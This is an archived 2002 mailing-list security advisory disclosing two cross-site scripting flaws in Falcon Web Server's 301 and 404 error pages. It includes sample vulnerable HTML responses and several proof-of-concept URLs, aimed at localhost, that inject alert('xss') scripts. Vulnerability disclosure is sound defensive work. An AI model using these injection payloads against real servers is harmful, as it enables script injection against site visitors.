OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Thu Aug 08 2002 - 18:31:20 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    From Developer:

    "Falcon Web Server is running under Windows NT/2000/XP as well as Windows
    95/98. It supports ISAPI and WinCGI, and it is a fully functional web
    server which is capable of running a small / medium scale website of about
    50-80 hits per minute. The real advantage of Falcon Web Server is the
    ability to run on a desktop computer with almost the same functionality as
    large-scale web servers like MS IIS and Apache."

    A lack of input sanitation in the error message output of this server makes
    it susceptible to two cross-site scripting vulnerabilities:

    * An issue in the way the server handles 301 messages when a file is not
    found, and the request is not terminated by a slash. Falcon simply adds a
    slash to the request URI, and sends back a 301 with the following entity:

    <html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir
    ecting browser to <a
    href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b
    r>If nothing happens click the link above.</body></html>

    * An issue in the way the server handles 404 messages when a file/folder is
    not found, and the necessary slash has been added (entity below):

    <html><head><title>HTTP/1.0 404 Not
    Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
    Found</h1><p>Cannot locate the requested file.</body></html>

    Examples:

    * 301 Message XSS

    Closing TITLE tag:
    http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A HREF:
    http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A tag:
    http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

    * 404 Message XSS

    http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

    The 301 examples will simply add a slash and pass it on to the browser,
    which then raises a 404, exploiting that vulnerability as well (although the
    301 exploits will cause some useless HTML to be added on)

    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown